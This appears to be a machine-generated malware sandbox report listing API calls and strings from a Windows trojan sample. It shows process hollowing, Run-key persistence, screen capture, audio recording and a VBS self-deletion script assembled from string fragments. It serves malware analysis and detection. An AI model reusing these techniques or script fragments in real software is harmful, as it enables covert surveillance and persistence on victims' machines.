                                                                                                • Opcode Fuzzy Hash: 7fba601ea237378da0a977c6d17b643b08c3bbb2c23d121bede84fc2343487d0
                                                                                                • Instruction Fuzzy Hash: FA21A172510206ABDB249E25DD41ABB73A8EF46316F1001BBFD05C6242EBBC9D49CB58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
                                                                                                  • Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
                                                                                                  • Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
                                                                                                  • Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153
                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452222,00000000,00000000,?), ref: 004524B0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 2692324296-0
                                                                                                • Opcode ID: 9d656f9379a7b598a5a8f503f6b0d832b9571a3900ff8c3681835d602033eb24
                                                                                                • Instruction ID: f34ea85dd6e778248c48bb084e231636f9c5f88c26065830af7cae6304855a84
                                                                                                • Opcode Fuzzy Hash: 9d656f9379a7b598a5a8f503f6b0d832b9571a3900ff8c3681835d602033eb24
                                                                                                • Instruction Fuzzy Hash: A3F04932610115BBEB249A258D05BBB7758EB42329F05442BEC05A3641EABCFD09C6D8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
                                                                                                  • Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
                                                                                                  • Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
                                                                                                  • Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153
                                                                                                • EnumSystemLocalesW.KERNEL32(00452254,00000001,?,?,004449AC,?,004525F5,004449AC,?,?,?,?,?,004449AC,?,?), ref: 00451FC3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 1084509184-0
                                                                                                • Opcode ID: 70517d43b4834d2b39e75724c999b3c1fcf492dd8bbf48b98f78387c5afd5eb7
                                                                                                • Instruction ID: faa2e26f21619674753b63803d444ebcdc18fb653b9977e4b6b54c84cafa8984
                                                                                                • Opcode Fuzzy Hash: 70517d43b4834d2b39e75724c999b3c1fcf492dd8bbf48b98f78387c5afd5eb7
                                                                                                • Instruction Fuzzy Hash: 2BF022363043086FDB145F3A9881B7BBB94EF80329F05442EFE058B691D7B5DC06C644
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004457C8: EnterCriticalSection.KERNEL32(-0006D41D,?,00442F1B,00000000,0046E928,0000000C,00442ED6,?,?,?,00445A66,?,?,0044818A,00000001,00000364), ref: 004457D7
                                                                                                • EnumSystemLocalesW.KERNEL32(0044827E,00000001,0046EAD0,0000000C), ref: 004482FC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                • String ID:
                                                                                                • API String ID: 1272433827-0
                                                                                                • Opcode ID: 4b03c8790a3543633605fcd17a66047c3d30e6fd317312de70b0945699c1eca3
                                                                                                • Instruction ID: 3e0b6544518826b1513a4e636f39db4c7c6778963d5a3a3654a3fb2fc2b31fc3
                                                                                                • Opcode Fuzzy Hash: 4b03c8790a3543633605fcd17a66047c3d30e6fd317312de70b0945699c1eca3
                                                                                                • Instruction Fuzzy Hash: E0F04435550200EFEB04EF69D946B4D77E0EB04725F10456AF414DB2A2CB7889808B59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
                                                                                                  • Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
                                                                                                  • Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
                                                                                                  • Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153
                                                                                                • EnumSystemLocalesW.KERNEL32(00451DE8,00000001,?,?,?,00452653,004449AC,?,?,?,?,?,004449AC,?,?,?), ref: 00451EC8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 1084509184-0
                                                                                                • Opcode ID: 0f27a19467b537bc2edb91f12de862bc09ba8748d1eb205a07958a60be29cb7c
                                                                                                • Instruction ID: f3168094b20094f9071e390e10ad46a9319e24188657ea19079ada7b49c20968
                                                                                                • Opcode Fuzzy Hash: 0f27a19467b537bc2edb91f12de862bc09ba8748d1eb205a07958a60be29cb7c
                                                                                                • Instruction Fuzzy Hash: CDF0553630020867CB04AF36C846B6BBF90EFC2722F06405EEE058B262C63AD846C754
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418DDE
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00418DEB
                                                                                                  • Part of subcall function 00419273: EnumDisplaySettingsW.USER32 ref: 004192A3
                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418E61
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418E78
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418E7B
                                                                                                • DeleteObject.GDI32(00000000), ref: 00418E7E
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00418E9F
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418EB0
                                                                                                • DeleteDC.GDI32(00000000), ref: 00418EB3
                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418ED7
                                                                                                • GetIconInfo.USER32(?,?), ref: 00418F0B
                                                                                                • DeleteObject.GDI32(?), ref: 00418F3A
                                                                                                • DeleteObject.GDI32(?), ref: 00418F47
                                                                                                • DrawIcon.USER32 ref: 00418F54
                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00418F8A
                                                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 00418FB6
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419023
                                                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 00419092
                                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004190B6
                                                                                                • DeleteDC.GDI32(?), ref: 004190CA
                                                                                                • DeleteDC.GDI32(00000000), ref: 004190CD
                                                                                                • DeleteObject.GDI32(00000000), ref: 004190D0
                                                                                                • GlobalFree.KERNEL32 ref: 004190DB
                                                                                                • DeleteObject.GDI32(00000000), ref: 0041918F
                                                                                                • GlobalFree.KERNEL32 ref: 00419196
                                                                                                • DeleteDC.GDI32(?), ref: 004191A6
                                                                                                • DeleteDC.GDI32(00000000), ref: 004191B1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                                                • String ID: DISPLAY
                                                                                                • API String ID: 479521175-865373369
                                                                                                • Opcode ID: 54eda4c38d6e83943b933f0922487bdf4f9de85190a38fb7e1d9866d6738ab1c
                                                                                                • Instruction ID: e7c3367f6c681fa8515d566fd421d68283470b6e3bdb4c9c352ce811123ef30b
                                                                                                • Opcode Fuzzy Hash: 54eda4c38d6e83943b933f0922487bdf4f9de85190a38fb7e1d9866d6738ab1c
                                                                                                • Instruction Fuzzy Hash: 0FC14971508301AFD7209F25DC44BABBBE9EB88755F00482EF98993291DB34ED45CB6A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418084
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418087
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418098
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041809B
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004180AC
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004180AF
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004180C0
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004180C3
                                                                                                • CreateProcessW.KERNEL32 ref: 00418165
                                                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041817D
                                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 00418193
                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004181B9
                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041823B
                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 0041824F
                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041828F
                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418359
                                                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 00418376
                                                                                                • ResumeThread.KERNEL32(?), ref: 00418383
                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041839A
                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 004183A5
                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004183C0
                                                                                                • GetLastError.KERNEL32 ref: 004183C8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                • API String ID: 4188446516-3035715614
                                                                                                • Opcode ID: 351650298d540e07d33211bf4070d990af1111825dfb992b7f52e155835243ae
                                                                                                • Instruction ID: 4b3dbf9c3380ce27638f34cb54b94d9f6342d2977b347f3e8d94ef5a61c839a9
                                                                                                • Opcode Fuzzy Hash: 351650298d540e07d33211bf4070d990af1111825dfb992b7f52e155835243ae
                                                                                                • Instruction Fuzzy Hash: CBA17E70604305EFDB209F64DD85BAB7BE8FB48705F04082EF699D6291DB79D844CB2A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0041279E: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F816), ref: 004127AE
                                                                                                  • Part of subcall function 0041279E: WaitForSingleObject.KERNEL32(000000FF), ref: 004127C1
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D46B
                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D47E
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D497
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D4C7
                                                                                                  • Part of subcall function 0040B7FA: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D006,004752D8,004752F0,?,pth_unenc), ref: 0040B809
                                                                                                  • Part of subcall function 0040B7FA: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B815
                                                                                                  • Part of subcall function 0040B7FA: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B823
                                                                                                  • Part of subcall function 0041C33F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D347,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C37E
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D712
                                                                                                • ExitProcess.KERNEL32 ref: 0040D71E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                • API String ID: 1861856835-332907002
                                                                                                • Opcode ID: b4ad2fe907f683c4574643f9a94cb9fabd582ef51e0f8c485010ca73aa315bfd
                                                                                                • Instruction ID: 41ae5eec8d8c852c0cc3c178e0f1137f2a0bda96d0f509e590d0bd6d09efdebf
                                                                                                • Opcode Fuzzy Hash: b4ad2fe907f683c4574643f9a94cb9fabd582ef51e0f8c485010ca73aa315bfd
                                                                                                • Instruction Fuzzy Hash: CB91B4716082005AC315FB62D892AAF77A9AF90309F10443FB54AA31E3FF7C9D49C65E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0041279E: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F816), ref: 004127AE
                                                                                                  • Part of subcall function 0041279E: WaitForSingleObject.KERNEL32(000000FF), ref: 004127C1
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D0F3
                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D106
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D136
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D145
                                                                                                  • Part of subcall function 0040B7FA: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D006,004752D8,004752F0,?,pth_unenc), ref: 0040B809
                                                                                                  • Part of subcall function 0040B7FA: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B815
                                                                                                  • Part of subcall function 0040B7FA: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B823
                                                                                                  • Part of subcall function 0041B8C6: GetCurrentProcessId.KERNEL32(00000000,7782FBB0,00000000,?,?,?,?,00466468,0040D15B,.vbs,?,?,?,?,?,004752F0), ref: 0041B8ED
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D360
                                                                                                • ExitProcess.KERNEL32 ref: 0040D367
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                                                                                • API String ID: 3797177996-2557013105
                                                                                                • Opcode ID: e14672d76131e3465f8f58df1f8aaca31c2fc8196c5921b6896a948eecdb4e6d
                                                                                                • Instruction ID: 8b66d43f73e9098c463d934601f02000e5e1a777e94df9333dfdffdf5747c3a2
                                                                                                • Opcode Fuzzy Hash: e14672d76131e3465f8f58df1f8aaca31c2fc8196c5921b6896a948eecdb4e6d
                                                                                                • Instruction Fuzzy Hash: C381AF716082005BC719FB22D852AAF77A9AFD1308F10483FB14A671E2EF7C9D49C65E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004123E2
                                                                                                • ExitProcess.KERNEL32(00000000), ref: 004123EE
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412468
                                                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412477
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412482
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412489
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0041248F
                                                                                                • PathFileExistsW.SHLWAPI(?), ref: 004124C0
                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00412523
                                                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041253D
                                                                                                • lstrcatW.KERNEL32(?,.exe), ref: 0041254F
                                                                                                  • Part of subcall function 0041C33F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D347,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C37E
                                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041258F
                                                                                                • Sleep.KERNEL32(000001F4), ref: 004125D0
                                                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004125E5
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004125F0
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004125F7
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004125FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                                                • API String ID: 2649220323-436679193
                                                                                                • Opcode ID: 9f2b8ccfe80d972c1099c6e698ebda80368bb01183b921761bdf034cc0064ffe
                                                                                                • Instruction ID: 8ef474c935fd0aa6f7fd22daa97b647f48f9d568775161eff7735b799635912c
                                                                                                • Opcode Fuzzy Hash: 9f2b8ccfe80d972c1099c6e698ebda80368bb01183b921761bdf034cc0064ffe
                                                                                                • Instruction Fuzzy Hash: 0B51A671A00315BBDB10ABA09D99AEE336D9B04715F10446BF901E71D2EFBC8E85865D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B08A
                                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B09E
                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B0C6
                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B0DC
                                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B11D
                                                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B135
                                                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B14A
                                                                                                • SetEvent.KERNEL32 ref: 0041B167
                                                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B178
                                                                                                • CloseHandle.KERNEL32 ref: 0041B188
                                                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B1AA
                                                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B1B4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                                • API String ID: 738084811-2094122233
                                                                                                • Opcode ID: 2a7ffd031394d11ac2506a3841417e646b0b4c90081be383c47fe004e03838fc
                                                                                                • Instruction ID: 48557ae7e310582626121f23f7169a642ba8ba4df6540ddaacaa5f45de19cc96
                                                                                                • Opcode Fuzzy Hash: 2a7ffd031394d11ac2506a3841417e646b0b4c90081be383c47fe004e03838fc
                                                                                                • Instruction Fuzzy Hash: A65183B12442056AD315B731DC96EBB779CEB84359F10043FF14A621E2EF788D498A6E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                                • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                                • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                                • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Write$Create
                                                                                                • String ID: RIFF$WAVE$data$fmt
                                                                                                • API String ID: 1602526932-4212202414
                                                                                                • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                                                                • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                                                                                • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                                                                • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\yaALNupJCH.exe,00000001,0040764D,C:\Users\user\Desktop\yaALNupJCH.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc
                                                                                                • String ID: C:\Users\user\Desktop\yaALNupJCH.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                • API String ID: 1646373207-1095183327
                                                                                                • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                                                • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                                                                                • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                                                • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 0040CD55
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CD6E
                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\yaALNupJCH.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CE1E
                                                                                                • _wcslen.LIBCMT ref: 0040CE34
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CEBC
